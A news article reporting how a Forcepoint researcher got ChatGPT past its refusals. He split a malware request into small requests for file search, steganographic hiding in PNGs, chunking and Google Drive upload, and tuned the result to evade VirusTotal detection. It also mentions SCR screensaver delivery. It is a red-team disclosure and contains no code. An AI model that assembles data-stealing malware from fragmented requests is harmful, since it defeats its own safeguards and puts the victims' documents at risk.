Headline
Researcher Tricks ChatGPT Into Building Undetectable Steganography Malware
Using only ChatGPT prompts, a Forcepoint researcher convinced the AI to create malware for finding and exfiltrating specific documents, despite its directive to refuse malicious requests.
A security researcher has tricked ChatGPT into building sophisticated data-stealing malware that signature and behavior-based detection tools won’t be able to spot — eluding the chatbot’s anti-malicious-use protections.
Without writing a single line of code, the researcher, who admits he has no experience developing malware, walked ChatGPT through multiple, simple prompts that ultimately yielded a malware tool capable of silently searching a system for specific documents, breaking up and inserting those documents into image files, and shipping them out to Google Drive.
In the end, all it took was about four hours from the initial prompt into ChatGPT to having a working piece of malware with zero detections on Virus Total, says Aaron Mulgrew, solutions architect at Forcepoint and one of the authors of the malware.
Busting ChatGPT’s Guardrails
Mulgrew says the reason for his exercise was to show how easy it is for someone to get past the guardrails that ChatGPT has in place to create malware that normally would require substantial technical skills.
“ChatGPT didn’t uncover a new, novel exploit,” Mulgrew says. “But it did work out, with the prompts I had sent to it, how to minimize the footprint to the current detection tools out there today. And that is significant.”
Interestingly (or worryingly), the AI-powered chatbot seemed to understand the purpose of obfuscation even though the prompts did not explicitly mention detection evasion, Mulgrew says.
This latest demonstration adds to the rapidly growing body of research in recent months that has highlighted security issues around OpenAI’s ChatGPT large language model (LLM). The concerns include everything from ChatGPT dramatically lowering the bar to malware writing and adversaries using it to create polymorphic malware to attackers using it as bait in phishing scams and employees cutting and pasting corporate data into it.
Some contrarians have questioned whether the worries are overhyped. And others, including Elon Musk, an early investor in OpenAI, and many industry luminaries, have even warned that future, more powerful AIs (like the next version of the platform that ChatGPT is based on) could quite literally take over the world and threaten human existence.
Prompting Malicious Code Into ChatGPT
Mulgrew’s research is likely to do little to calm those who see AI tools as posing a major security risk. In a Forcepoint blog post this week, Mulgrew provided a step-by-step description of how he coaxed ChatGPT into building a full-fledged malware tool starting with an initial request to generate code that would qualify as malware.
When ChatGPT’s content filter predictably denied that request, Mulgrew decided to take an approach where he would try and get the AI tool to generate small snippets of code which, when put together, would function as data-stealing malware.
His first successful prompt was when he got ChatGPT to generate code that would search for PNG image files larger than 5MB on the local disk. Using that code, he then asked ChatGPT for additional code for encoding any discovered PNGs with steganography. It was a prompt to which ChatGPT responded by providing a call to readily available steganographic library on GitHub.
Using a series of other prompts, Mulgrew then got ChatGPT to generate additional code to look for and find Word and PDF documents on the local disk. He then figured out a way to get ChatGPT to write code for breaking up files larger than 1MB into smaller chunks, inserting them into the PNGs, and using steganography to hide them.
The final piece was getting the chatbot to write code for uploading the data to an external Google drive account — Mulgrew successfully tricked the AI into creating malware despite its training to refuse malicious requests.
Zero Detections on Virus Total
To test if malware detection tools would flag the ChatGPT-generated code as malicious, Mulgrew uploaded the code to Virus Total. He found that five vendors out of 60 marked the file as suspicious. After figuring out the issue might have to do with how the ChatGPT code called the steganographic library, Mulgrew asked the chatbot to tweak the code, after which only two vendor products flagged it as suspicious. After some further tweaking, he finally ended up with code that no products on VirusTotal detected.
For initial infiltration, Forcepoint researchers asked ChatGPT to create a SCR file or screensaver file and embed the executable inside it under the disguise of additional “ease of use” for everyday business applications, Mulgrew says.
“ChatGPT happily generated step-by-step instructions on how I could do that and configure the SCR file to auto launch the executable.” While the method is not unique, it was interesting that ChatGPT generated the content without Forcepoint researchers having to find ways to bypass its guardrails, he says.
Mulgrew says it’s almost certain that ChatGPT would generate different code for similar prompts meaning that a threat actor would relatively easily be able to spin up new variants of such tools. He says that based on his experience, a threat actor would need little more than basic knowledge of how to write malware to get past ChatGPT’s anti-malware restrictions.
“I don’t write malware or conduct penetration tests as part of my job and looking at this is only a hobby for me,” he says. “So, I’d definitely put myself more in the beginner/novice category than expert hacker.”